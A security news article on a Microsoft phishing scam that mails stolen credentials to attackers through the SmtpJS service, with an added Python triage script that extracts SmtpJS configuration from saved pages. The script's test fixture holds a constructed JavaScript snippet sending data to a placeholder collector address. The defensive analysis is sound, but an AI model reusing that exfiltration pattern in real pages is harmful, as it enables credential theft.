
New Microsoft phishing scam sends stolen credentials to scammers via SmtpJS service

  • The phishing page used in this scam utilizes the SmtpJS service to send the stolen credentials to the attacker via JavaScript.
  • This methodology benefits security researchers and analysts as they can view the source for the landing page to see the configuration being used by the SmtpJS service.

A brief overview

Researchers from MalwareHunterTeam have observed a new Microsoft account phishing scam, wherein the phishing page uses the SmtpJS service to send the stolen credentials to the scammer via an email.

  • In this scam, attackers use fake Microsoft login templates that prompt users to submit their Microsoft account credentials.
  • Once users submit their credentials, the phishing page will display a message stating that the submitted credentials are incorrect while saving the credentials in a database for later use.
  • The phishing page then utilizes the SmtpJS service to send the stolen credentials to the attacker via JavaScript.

The methodology that benefits the researchers

This technique benefits security researchers and analysts as they can view the source for the landing page to see the configuration being used by SmtpJS.

  • The configuration used by the SmtpJS service includes the sender’s email address, the stolen credentials, the scammer’s email address to which the email will be sent, and the secure token needed to send an email via SmtpJS.
  • This configuration is also passed along to smtpjs.com when a user enters their credentials so that it can generate an email to the specified user.

Using this config information, analysts and researchers can easily track the scammer behind the campaign.
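For analysts triaging a saved copy of a suspected landing page, the following added example (not code from the article or from MalwareHunterTeam) extracts the SmtpJS configuration from static page source. The field names `SecureToken`, `To`, `From` and `Subject` and the `Email.send` call are assumed from SmtpJS's public usage, and the sample page is constructed with placeholder values.

```python
import re

# Field names are assumed from SmtpJS's public Email.send() usage, not from the article.
FIELDS = ("SecureToken", "To", "From", "Subject")
SCRIPT_RE = re.compile(r"<script[^>]+src\s*=\s*[\"'][^\"']*smtpjs\.com[^\"']*[\"']", re.I)
CALL_RE = re.compile(r"Email\s*\.\s*send\s*\(\s*\{(.*?)\}\s*\)", re.S)
PAIR_RE = re.compile(r"\b(%s)\s*:\s*([\"'])(.*?)\2" % "|".join(FIELDS), re.S)

def triage(html):
    """Pull SmtpJS indicators out of saved page source (static text only)."""
    configs = []
    for call in CALL_RE.finditer(html):
        cfg = {}
        for m in PAIR_RE.finditer(call.group(1)):
            cfg.setdefault(m.group(1), m.group(3))  # first literal wins
        configs.append(cfg)
    loads = bool(SCRIPT_RE.search(html))
    return {
        "loads_smtpjs": loads,
        "configs": configs,
        # Library present but no literal config: built at runtime or obfuscated.
        "needs_manual_review": loads and not any(configs),
    }

# Constructed sample, not taken from a real page; all values are placeholders.
SAMPLE = """
<html><head><script src="https://smtpjs.com/v3/smtp.js"></script></head>
<body><script>
function report(body) {
  Email.send({
    SecureToken : "00000000-0000-0000-0000-000000000000",
    To : 'collector@example.invalid',
    From : "sender@example.invalid",
    Subject : "constructed sample",
    Body : body
  });
}
</script></body></html>
"""

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

The extracted `To` address and token are the pivots for tracking a campaign; a page that loads the library without a literal configuration is flagged for manual review rather than treated as clean.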

Recommendations

System administrators can also benefit from this methodology by blocking the SmtpJS service on their web filters. It is best to block access to the SmtpJS service and phishing pages that use the service to stay protected against such scams.
